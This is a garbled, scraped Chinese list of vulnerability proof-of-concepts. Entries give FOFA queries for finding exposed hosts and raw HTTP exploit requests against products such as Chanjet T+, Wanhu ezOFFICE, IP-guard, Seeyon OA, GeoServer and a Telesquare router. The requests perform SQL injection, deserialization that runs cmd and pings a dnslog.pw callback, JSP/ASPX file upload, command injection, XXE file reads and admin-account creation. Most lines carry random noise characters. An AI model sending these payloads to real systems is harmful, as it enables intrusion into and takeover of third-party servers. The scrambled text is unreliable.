& y. I5 C$ l( m& MHost: x.x.x.x
4 S' n% e1 A2 J+ @" MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.366 x; e6 w( v( A; H# j! {1 ]
Content-Type: application/json
# z+ Y4 w" j  b
+ o9 X: m( M, {7 t' x{
) ]/ ~5 M7 v4 p6 D  "storeID":{
. p. a% U) X, b" r' x    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
' j/ w; U3 r- P+ R6 E   "MethodName":"Start",
/ {" ?0 X' Y0 l' B, m  |    "ObjectInstance":{
2 H3 G" K, d) L       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
( Q0 [- N* `# Q) N( D        "StartInfo": {8 }7 b0 g; i4 P% w* U  R
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 `. b2 [+ A( i7 T
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
- ], Q* w& U) C2 Z) p7 ?- D$ I       }* R. D5 u" K1 u
    }5 V- W- ^8 b% U9 B0 I' ]
  }
* u& X2 E7 C6 f}
$ n* }& Q/ L& x$ s6 V4 @' P. R9 Z2 W& W7 v4 h

( h: S# O+ b4 y( Z) l+ y57. 畅捷通T+ keyEdit.aspx SQL注入
6 |7 I* d' j) m. B8 p0 G, YFOFA:app="畅捷通-TPlus"
' V  [# B  ?  S" kGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
9 s8 U. v( |& e9 j* l9 O( G2 LHost: host
) h5 p5 ]$ `  rUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36! Z' U* O3 [2 \: X3 {5 n% s
Accept-Charset: utf-8
) D& Q- i; q8 Q0 d8 F+ c: m' WAccept-Encoding: gzip, deflate
0 y) C: C- f% E/ RConnection: close
- {& {0 e) r7 O3 ?6 L' Z
' e! a  q8 \  ?' T: P9 i8 @9 K: a& Y3 ^8 r
58. 畅捷通T+ KeyInfoList.aspx sql注入
' a/ a2 M, w- A' T/ g# WFOFA:app="畅捷通-TPlus"/ }" Q9 U2 W% g5 j5 W
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
! f6 l6 R  ^) L, ?Host: your-ip
/ m/ ~1 D1 z8 v) ~8 W- T: r/ mUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ w+ `& X4 ?$ {; Q5 v
Accept-Charset: utf-8* ]) v& w- t1 ~1 M
Accept-Encoding: gzip, deflate
) _- M3 [$ K, E  F0 ?7 N, _Connection: close7 |+ B0 A2 V+ U/ }
' R4 v5 |+ }, L! Q+ b

0 ?$ h( G  D' ?9 Z' w0 J  ?59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行. L# F, u9 p# {" I
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
$ ^8 F5 X0 N& E) l$ `POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
0 v+ n) e3 S' E  @7 V8 _Host: 192.168.86.128:9090$ e, p7 H( z- l( x6 c9 T
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+ ~( A, p5 ]9 H, j3 Y' A: WConnection: close
# }9 w+ s0 Y0 {2 g8 qContent-Length: 1669
, W4 _! m& @' P5 X! `1 N$ ^Accept: */*
- f  Y0 S0 [& @% I& S6 A8 @0 M3 OAccept-Language: en
. l' L7 y- s. fContent-Type: application/x-www-form-urlencoded
) O1 O& }  A& x3 k7 |! a/ kAccept-Encoding: gzip5 F+ p+ U+ S/ i
7 C6 ?  J6 F& a7 b1 a/ g
PAYLOAD* G$ [1 f+ v+ C: u+ H( r

" k  G" w2 G5 r$ j/ |4 ~2 q
% b/ p! b8 D! ]) c0 I8 v60. 百卓Smart管理平台 importexport.php SQL注入7 |7 i6 C, }5 j8 `: D5 w
FOFA:title="Smart管理平台"# O1 @' T6 ~- o; Q8 l) Y8 W
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1+ f) H% S& S" D' t- X
Host:
% v# _2 T( i+ W( y; k: HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 x8 K4 w/ s9 o9 x( V8 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, P8 F2 ?& C. G8 Q/ H% v5 v
Accept-Encoding: gzip, deflate# C( y) B7 X2 T- g% d
Accept-Language: zh-CN,zh;q=0.9
: S& U8 L) o+ r, ?/ B. Y# \Connection: close: \+ b5 W5 T9 C) e9 z: @

( D& E3 U1 f4 P7 q7 C) d0 w  N8 O& Y' D* t# m4 K+ t; q6 g3 \
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
$ S7 P6 z" R! ^9 Y7 VFOFA: title="欢迎使用浙大恩特客户资源管理系统"
/ G8 x) H9 I- Z; HPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
+ m* s! j9 r0 [' J, [- ]. E; @4 ^Host: x.x.x.x* E; E1 p% B6 S4 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* W3 ?5 A/ m) n
Connection: close
/ N' K& O, l* Z! c  zContent-Length: 27
1 @, E6 e3 q2 v( t$ z5 a" v. s7 MAccept: */*
5 t5 t" V' Y3 y; k3 U* }" yAccept-Encoding: gzip, deflate" ^2 D( x9 _# W9 q
Accept-Language: en
; V6 p# Z+ e6 S( Z6 CContent-Type: application/x-www-form-urlencoded
5 u8 B8 e: e3 a6 F5 {/ F+ e5 p: {& u) |5 @
8uxssX66eqrqtKObcVa0kid98xa
& i$ o* a. X. x( O$ {0 L9 s: y, p

  A7 p' i# ^1 t1 M% a0 ~$ p8 x: O& \62. IP-guard WebServer 远程命令执行
! N3 ~/ W( S; Q5 \) KFOFA:"IP-guard" && icon_hash="2030860561"; p: P- @4 e, [" k
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
0 c- g- s5 I9 a! X3 pHost: x.x.x.x) y  D% y* L7 A* j3 Y
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.366 a6 x) A4 D8 S
Connection: close; R  K5 a6 u. {: G5 o
Accept: */*
; N1 C2 d$ U( [3 I, S7 {$ m7 kAccept-Language: en
5 R( q3 m. u* ]! lAccept-Encoding: gzip: i5 X0 S( r. @) p4 x

. x2 i4 }+ D% p' ]) g1 u- Z; p! @- d3 R
访问
) f2 s" Z0 e( Q. U# K% r1 u) i  H# x3 q) C  d; A
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1' `8 D( b* s4 `! n
Host: x.x.x.x
6 l& p4 f' @! A1 i8 Z5 c/ m3 R$ R4 U% w, t6 |

5 b; c- U  B& R( c0 T% y# L63. IP-guard WebServer任意文件读取" r3 e6 v, w. u. N+ c
IP-guard < 4.82.0609.0* A& Q9 e/ j! u7 t
FOFA:icon_hash="2030860561"
) o- b; W& X4 tPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
! }) d" {' p& d. N  w8 ^& C" I( tHost: your-ip8 J1 t1 i6 O9 d# B. ?7 ]0 i/ |" p. T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ T% y5 D+ O! s/ L) Y- C1 p( }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 J+ u" ]& U7 p1 l; Z1 }- }Accept-Encoding: gzip, deflate& I/ U* i0 {! g6 H( m' z& L6 I
Accept-Language: zh-CN,zh;q=0.9
$ D# G0 S# I7 t1 B+ I; kConnection: close
0 v' p7 ?% M* L$ h6 h& fContent-Type: application/x-www-form-urlencoded4 p7 o2 a3 q% w' u

% C: C  S- d0 bpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A# d# k) k# @' I- T
" B6 P  A6 U9 H0 }; A% o
64. 捷诚管理信息系统CWSFinanceCommon SQL注入4 b/ C/ ?2 b9 S2 q
FOFA:body="/Scripts/EnjoyMsg.js"
6 s) |9 Y- Q' R1 S* W( sPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
( _, V' w. C2 _- `Host: 192.168.86.128:9001* {, D2 \$ v) I$ Q1 Q2 f. a: d
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
! R; z9 j/ Q* g* R. a" {Connection: close
5 i; T" `$ a  U" OContent-Length: 369: ^# M5 O8 P2 h6 ]$ j
Accept: */*
4 y: S4 n. e+ r" SAccept-Language: en
% y- [# M7 h7 k# q: WContent-Type: text/xml; charset=utf-8: v. B) y8 k: F6 j+ q4 n& l
Accept-Encoding: gzip
/ Z2 M2 r& }% C9 L
- x& a) N8 {0 S" r* O<?xml version="1.0" encoding="utf-8"?>
) w7 B4 U  S- ^* a<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 q8 `/ W/ ^) c- K- s- O- E
<soap:Body>5 N1 A2 _& k( O7 D% v
    <GetOSpById xmlns="http://tempuri.org/">
) [: c# X6 w  k      <sId>1';waitfor delay '0:0:5'--+</sId>; U5 F' N& n1 V) Z8 N
    </GetOSpById>% \9 [/ G% N* E) c6 [
  </soap:Body>
# ~' F8 C) h8 V3 |8 l! C  y</soap:Envelope>0 e2 q: n+ r6 I/ [
  q8 X! V3 Z! z9 N6 W( m

& `6 d# C2 e8 A65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" ]$ S1 H+ t! o+ x' C, o
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
& \" s2 u: Y- Z/ O响应200即成功创建账号test123456/1234563 p. a. U3 m* g2 B7 t8 A( ~. q
POST /SystemMng.ashx HTTP/1.17 P9 X) c8 P( o
Host:8 k5 f- {7 K% t$ d2 \
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)8 A" z1 ~7 T. b4 c+ V9 m
Accept-Encoding: gzip, deflate5 {" `' I3 y! Q- R$ w$ p$ X; V5 e
Accept: */*! v3 a/ f/ l* T6 _; z- i, X! p3 i9 z
Connection: close, f) N8 ]2 ^$ X* v7 Y% u! x4 e
Accept-Language: en
4 X+ T# D  @+ A: @Content-Length: 1743 V1 ]6 t0 k- e8 z( U& V3 w9 t
  `0 V8 _' Q8 l
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators* y! y9 {3 e3 g

) @5 Z7 X- f6 I, p$ u* o9 `5 k; I! A2 n$ N6 f; j5 N+ R# Q8 h
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* }- K1 h6 a; y0 V0 O. Q
FOFA:app="万户ezOFFICE协同管理平台"
4 r1 T- I4 @* W' N  v- C
6 J) d( _0 r9 Q7 `, T: \GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1- s( O. K2 \/ \
Host: x.x.x.x
. e0 [2 I8 q; Q* u! u) p. lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
2 R( Y' b' Z  `! [5 d0 nConnection: close- O) O" O5 W* @3 u) L
Accept: */*
% A* Q* {4 J, y6 aAccept-Language: en5 O' M, H  p0 s; ^6 S: h- x+ u
Accept-Encoding: gzip" ^  I4 d, D4 J1 G+ @

5 @* d" n! ]0 c( _7 _, |- `3 \! l6 \2 C/ }3 N9 F1 M
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在  Z/ [& e6 O( t* X$ R2 Y9 S* ~. d  K- W

4 r, n; v6 T) U  e- X9 K' H! |67. 万户ezOFFICE wpsservlet任意文件上传% o$ [  z& L8 {9 e$ ~& c# @
FOFA:app="万户网络-ezOFFICE"" v0 ?3 ?  n; P/ T. F4 i9 g
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
: K: K- L# u7 }& x& {4 TPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.13 b1 `: I0 g6 f1 j; O
Host: x.x.x.x+ _! l" Z* A! O3 n/ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0, N( }; g+ ^5 j# z8 |( ?# N
Content-Length: 173/ B" c: R8 w' M- a8 w: t* G, n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8( Q) z4 l; h; S: G, Z
Accept-Encoding: gzip, deflate5 N" i; p5 K; g  B# O" w' A
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- j) L% Q# {& ^% M# JConnection: close8 h' \! q: ^) I1 l/ T: v
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
# W: `; n8 s$ ]: xDNT: 1
; O# k0 [& O3 B+ D; Y9 aUpgrade-Insecure-Requests: 1: h0 w% F: M) y. P# h: G

/ }& [! |7 i9 t--ufuadpxathqvxfqnuyuqaozvseiueerp$ s$ ~' _# j- X, X  T$ F! }- P
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
# d1 g& \1 S! q2 }: O9 J) T. g' B0 ?+ @# h2 G
<% out.print("sasdfghjkj");%>/ I" T& u+ i# A% ~
--ufuadpxathqvxfqnuyuqaozvseiueerp--& Q# \9 }- ^3 L, l8 R. D

7 a9 _& f' r6 U7 F8 w  i2 B+ p2 U4 d2 q4 c
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
% [' L9 L. h; P2 U( m
7 s) c) A! S9 i. ~1 C) h  `6 }68. 万户ezOFFICE wf_printnum.jsp SQL注入- N. x' I& V1 g4 Z8 |- F5 f3 n
FOFA:app="万户ezOFFICE协同管理平台"9 i  t5 B: b9 x# s" w9 a# G
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
5 K' a5 I* W. Z# }& ]; z' eHost: {{host}}
5 ~% r& k$ E- v2 u- ]% T. RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
: V. g  X& V/ Z, b0 x" k, P& r! g/ K: FAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.83 p# z7 J3 u0 d/ L! y: P- C
Accept-Encoding: gzip, deflate
' r% B$ {. l1 BAccept-Language: zh-CN,zh;q=0.9
: X2 N- ^( M: z5 o! J: v8 yConnection: close
5 m0 ^/ R, p0 k$ i/ D. `& E: E% B: D8 v' ~% B
* P. {2 ]4 \  a. n& @
69. 万户 ezOFFICE contract_gd.jsp SQL注入  |7 |& [1 K# t1 ~% P6 m3 `
FOFA:app="万户ezOFFICE协同管理平台"$ ?# N: T) I, }
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
4 ?- {9 u6 [6 D( x2 Y4 ]Host: your-ip
3 h5 t) n8 V$ a# _! L. u) Q0 WUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+ _( p7 [! |: u$ N: Q% H, dAccept-Encoding: gzip, deflate. @. c( H4 q  K: @7 ~, G. E1 L) C
Accept: */*
  p6 Q2 g( H) GConnection: keep-alive  c* b% V; e5 Y% ]% F+ _0 C4 n

9 r3 J, M/ h: E1 g4 C9 u. |: \3 k/ R* w
70. 万户ezEIP success 命令执行) ^) ]1 N( a3 _  n- [4 N
FOFA:app="万户网络-ezEIP"
0 x8 d- |2 V3 U/ |- ^/ b% ]POST /member/success.aspx HTTP/1.1
/ O  L$ M6 U/ v3 ^Host: {{Hostname}}
; R, q  k4 x; }5 D5 a- m8 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
& M' G7 \+ S4 y9 O1 `) ^/ jSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
. y1 J5 u" s* L2 u8 H, kContent-Type: application/x-www-form-urlencoded
4 k+ _/ z, W) v! a+ \7 E9 |TYPE: C
. b4 H0 ~5 S3 r. a: q# rContent-Length: 167024 j6 K# w* t4 Z& l8 R" C
  L! ^0 A0 X1 a
__VIEWSTATE=PAYLOAD
) @. W% a( w8 X: Y5 O% v- q
1 M3 U7 w' y7 c. ]; M* t1 U. `  ~: c! u0 E( |% a7 D+ L
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入- ]  k% F: z0 X2 g' _
FOFA:body="PM2项目管理系统BS版增强工具.zip"! r7 c- T9 |% }4 Y5 R
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1" Y7 a% T6 X8 V
Host: x.x.x.xx.x.x.x
, M3 b) S7 ]) @( MUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36  r+ m) ]9 l$ _1 _& {
Connection: close8 [6 g# C) I$ k( P: P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' O+ H/ ?% }0 J- B  R3 }4 wAccept-Encoding: gzip, deflate+ o" s3 ^+ h. T" E& \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 w) Z0 @5 z. ^# B+ v% U) GUpgrade-Insecure-Requests: 1
% b4 N6 Y" U! R# L
& O: Q. \, h1 ^7 q0 R6 {$ i. N3 e4 ~8 \, }
72. 致远OA getAjaxDataServlet XXE
# J) ~0 ^, Z  |4 p0 MFOFA:app="致远互联-OA"4 L' B8 I9 R- e
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
  q8 Z" {3 u! w7 K' pHost: 192.168.40.131:8099
+ r# H3 a* j( s9 w& h; EUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
& x$ ^, c* v4 `; qConnection: close' O* x% q% c  J- C
Content-Length: 583
9 i; z% l2 k" Z% j: M( n5 GContent-Type: application/x-www-form-urlencoded! r& n5 Q" x6 e: O
Accept-Encoding: gzip' p# Z/ S. Q- O* W, e! D- B3 k
, z0 C4 X+ P7 w8 p9 @/ o0 R0 t
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
( C$ U& S1 t' ?1 O- y, H7 @) |! w: L. \, o# K5 M9 v
8 b; Z: V4 O# x7 X3 v9 ^
73. GeoServer wms远程代码执行
* k" y6 q2 y6 {  @* RFOFA:icon_hash=”97540678”6 g/ h/ V4 O+ M. @1 H1 u4 R
POST /geoserver/wms HTTP/1.1
( M6 w2 e" {- [Host:3 S, j3 [9 y" w7 c( N9 ^# d3 f, _5 q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
- q" I, T5 w3 t8 UContent-Length: 1981
) ~, I9 s4 O! t! ]8 x" WAccept-Encoding: gzip, deflate" P1 S0 T. e' I0 G7 O% g( m- B
Connection: close
2 U/ [  h' g( F" e, Q7 UContent-Type: application/xml. F0 L4 l; E; ?! S) i* `; P+ V0 y
SL-CE-SUID: 3  x, }) B$ l- i7 t8 g7 [! ^
( c/ b' K2 r# K0 a
PAYLOAD; h' E% x0 \3 m; B. e5 e. ^; m

# d+ T; P0 i+ S. S  I9 `: N+ L& K  V# B+ z9 W  O
74. 致远M3-server 6_1sp1 反序列化RCE% A0 ^4 p1 d' ^/ e  d: H4 `# E
FOFA:title="M3-Server"" B. r1 _1 y+ P- R* z  \
PAYLOAD5 R) |1 E% u% T1 a
" Y2 s7 G9 G2 h* D% E- b$ U
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE9 @/ W1 e  K2 v# k8 N
FOFA:app="TELESQUARE-TLR-2005KSH"- T( R3 ^; u# C2 N/ }0 A. I5 ~
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
$ N1 r  c5 w0 A7 o, p9 |0 b* s- zHost: x.x.x.x8 G) I- e/ j( \/ p( I3 U: a& N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, G* y* [9 e& r  p2 U$ `3 [+ EConnection: close
! Q/ `" e3 Y* X, v+ P4 ]/ [) m2 A( B% oAccept: */*
6 D4 H0 x/ P7 l. j* O3 HAccept-Language: en
' b, o5 j8 a  S9 R4 C) }! TAccept-Encoding: gzip
; x8 R( G1 W4 \6 B7 z6 d* r
3 G9 }. q+ E  ]7 \
, h6 z6 G6 A1 ~; IGET /cgi-bin/test28256.txt HTTP/1.1
# G, {9 U: H* Q$ X; OHost: x.x.x.x
4 ]! c7 U! Y7 }- d( Y
/ K$ \8 s" Z0 O4 @2 b# L! E
9 M; P% ?  }' Y  b0 ^76. 新开普掌上校园服务管理平台service.action远程命令执行
2 i4 O$ C3 B5 v- O* g0 h- GFOFA:title="掌上校园服务管理平台"7 h: O$ P+ M- [& m- H& V
POST /service_transport/service.action HTTP/1.1: O' ]! I) b* R/ Q+ S
Host: x.x.x.x
0 I+ }$ [( X0 o3 E6 U8 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
7 `& q9 A2 Q4 p2 o* W( |( YConnection: close
; c; r$ P6 H5 c1 l, P$ dContent-Length: 211* K$ Z6 y; y, g# j/ R& L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( Z. ]* ~+ e2 G) r
Accept-Encoding: gzip, deflate) h/ m5 i2 F/ Z# r& X) j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  `7 W1 q; e3 x4 P+ X/ B% E
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
6 p6 h' q: `, Y& e5 }3 bUpgrade-Insecure-Requests: 1. L# W- W& j8 q

* `6 n3 s; Q. O  T2 \{
% l) Y8 _& c8 J6 a+ w% r( h"command": "GetFZinfo",2 L9 v$ i/ @6 m! N2 _
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
. Z* y* W' \6 Q( O" r3 C& r' t  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"% J2 T( G$ N3 S
}: l! {* S! ]5 e. `. |$ X

1 p) }' {) f" b6 a! @0 D, n
. |) |8 X. E6 D2 ~3 c0 NGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
( V( V3 A/ e& T/ p; O/ q( bHost: x.x.x.x
% |% J+ f/ X' _+ n7 c9 p) e3 b( Z9 F! h) S

# U+ u! P9 z4 G. c* ^9 s& x5 l; u: P1 S4 q- w
77. F22服装管理软件系统UploadHandler.ashx任意文件上传0 y! x8 g* K# B
FOFA:body="F22WEB登陆"
1 K) N8 E; g5 l; SPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1$ u  i5 \9 G+ q/ k+ a- R+ O) J! w" E' w
Host: x.x.x.x
: g+ ?9 T& d4 b8 L( r/ [7 a0 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ c4 f$ ^* Z$ M) g: i
Connection: close
6 ]! `' ~8 {( E# S) ]3 Y! MContent-Length: 433
0 _0 W' M! d* F& fAccept: */*3 ~4 z- }8 w+ M1 _8 y2 ^) k
Accept-Encoding: gzip, deflate
( S% i! E+ u! H8 Y5 iAccept-Language: zh-CN,zh;q=0.9: X! q* s8 j' M) L3 `
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix/ \$ Q/ R4 j) p- l
$ A! Q% K0 D& E% a6 Q- h$ V
------------398jnjVTTlDVXHlE7yYnfwBoix( o4 f. O3 m% T0 x  s
Content-Disposition: form-data; name="folder"" O1 J( r" ]. s' b3 e: m
# g' e" V% U* Z% c% k1 b8 j, O
/upload/udplog
2 f) P" e3 H- X+ ^- j7 j------------398jnjVTTlDVXHlE7yYnfwBoix6 j' Z5 P  ^0 P& s$ w# J( `
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
+ ^" |8 q& q, a. X, H/ k- x/ t: FContent-Type: application/octet-stream+ @: i0 Q+ R/ D3 a

! ^' f3 Z: m9 J& y" i" Fhello12345679 ]5 I8 ]% W0 N% A; o
------------398jnjVTTlDVXHlE7yYnfwBoix
0 R; q+ X$ v9 ~Content-Disposition: form-data; name="Upload"9 z6 `: _7 D; F; \
, [: R) O1 L6 i/ k0 F8 |
Submit Query
1 Z- m3 R. ~8 t7 k" ~* s------------398jnjVTTlDVXHlE7yYnfwBoix--2 u/ H. H* u9 A) n8 g% F& g
: r# ?3 s7 a) [% M# p, V1 a# p6 ~
6 F! v9 C! H& {6 Q
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传5 V1 S* L5 h" O4 x$ v
FOFA:icon_hash="2001627082") O8 g( z# B) j2 G  I8 u7 ]1 P
POST /Platform/System/FileUpload.ashx HTTP/1.1
8 e3 |+ s7 s* s/ I, [( gHost: x.x.x.x& ]6 e4 D8 A3 I5 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 Z! d8 ]+ M3 BConnection: close' o% [0 F" F0 |
Content-Length: 336
$ c( Z# I7 n* S, P/ f# oAccept-Encoding: gzip
5 O  C+ I9 M" V5 ?Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l( Z: F/ W3 S7 l( J4 ~/ a! k0 j& q
' e3 w3 a9 I5 j7 X+ D* ~0 R/ m
------YsOxWxSvj1KyZow1PTsh98fdu6l( _8 c6 h. G, b3 `' H/ H# i
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
. |7 s( m0 K8 O. \Content-Type: image/png
' M8 O& \$ n0 z' W
8 Q% ?! @7 ]4 @YsOxWxSvj1KyZow1PTsh98fdu6l' l/ A' P9 X' z- b" N& N( {
